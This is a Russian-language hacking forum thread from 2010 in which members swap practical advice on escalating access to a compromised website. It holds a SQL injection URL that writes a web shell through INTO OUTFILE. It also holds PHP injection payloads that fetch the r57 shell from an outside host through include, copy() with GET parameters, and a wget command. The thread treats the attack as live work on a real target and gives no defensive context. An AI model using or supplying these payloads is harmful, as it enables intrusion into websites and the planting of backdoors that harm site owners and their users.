HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #14081  
Старый 26.06.2010, 23:38
547
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147

Репутация: 211
По умолчанию

Цитата:
Сообщение от Konqi  
Konqi said:
а я о чем
значит только лимитом,или прогой что куда проще...
 
Ответить с цитированием

  #14082  
Старый 26.06.2010, 23:42
FlaktW
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014

Репутация: 8
По умолчанию

Залил shell , работает.

http://site.com/index.php?id=1+UNION+SELECT+1,'',2,3,4,5,6+into+ou tfile+'/data/web/www/shell.php'+--+

Как теперь залить r57shell.php , без загрузки формы?
 
Ответить с цитированием

  #14083  
Старый 26.06.2010, 23:43
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Цитата:
Сообщение от 547  
547 said:
значит только лимитом,или прогой что куда проще...
я юзаю limit, но не все же таблицы наc интересуют ) дело 2 минут
 
Ответить с цитированием

  #14084  
Старый 26.06.2010, 23:45
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Цитата:
Сообщение от FlaktW  
FlaktW said:
Залил shell , работает.
http://site.com/index.php?id=1+UNION+SELECT+1,'',2,3,4,5,6+into+ou tfile+'/data/web/www/shell.php'+--+
Как теперь залить r57shell.php , без загрузки формы?
?v=include("yoursite.ru/r57.php"); (allow_url_include=On)

?v=copy($_GET,$_GET[d]);&s=http://yoursite.ru/shell.txt&d=/data/web/www/r57.php;

но это при eval, зачем system

PHP код:
PHP:
[
COLOR="#000000"]'[COLOR="#0000BB"][/COLOR]'[/COLOR
 
Ответить с цитированием

  #14085  
Старый 27.06.2010, 00:12
547
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147

Репутация: 211
По умолчанию

Цитата:
Сообщение от FlaktW  
FlaktW said:
Залил shell , работает.
http://site.com/index.php?id=1+UNION+SELECT+1,'',2,3,4,5,6+into+ou tfile+'/data/web/www/shell.php'+--+
Как теперь залить r57shell.php , без загрузки формы?
а почему сразу инклуд зделать нельзя?
 
Ответить с цитированием

  #14086  
Старый 27.06.2010, 00:14
wkar
Познающий
Регистрация: 18.10.2009
Сообщений: 80
Провел на форуме:
1180165

Репутация: 11
По умолчанию

потому что там allow_url_include Off Off
 
Ответить с цитированием

  #14087  
Старый 27.06.2010, 00:16
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Цитата:
Сообщение от 547  
547 said:
а почему сразу инклуд зделать нельзя?

а если Allow_url_include=Off??

написал выше...
 
Ответить с цитированием

  #14088  
Старый 27.06.2010, 00:20
547
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147

Репутация: 211
По умолчанию

Цитата:
Сообщение от Konqi  
Konqi said:
а если
Allow_url_include=
Off
??
написал выше...
тогда

?cmd=wget http://site.ru/shell.php
 
Ответить с цитированием

  #14089  
Старый 27.06.2010, 00:23
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Цитата:
Сообщение от 547  
547 said:
тогда
?cmd=wget http://site.ru/shell.php
это уже другое дело, но нету гарантии что на сервере установлен wget )

зачем затруднять все (((

copy($source, $destination);
 
Ответить с цитированием

  #14090  
Старый 27.06.2010, 00:24
wkar
Познающий
Регистрация: 18.10.2009
Сообщений: 80
Провел на форуме:
1180165

Репутация: 11
По умолчанию

Цитата:
Сообщение от 547  
547 said:
тогда
?cmd=wget http://site.ru/shell.php
там винда, вгет не пашет..

Konqi хорошо написал, грузи через ?v=copy($_GET,$_GET[d]);&s=http://yoursite.ru/shell.txt&d=/data/web/www/r57.php
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ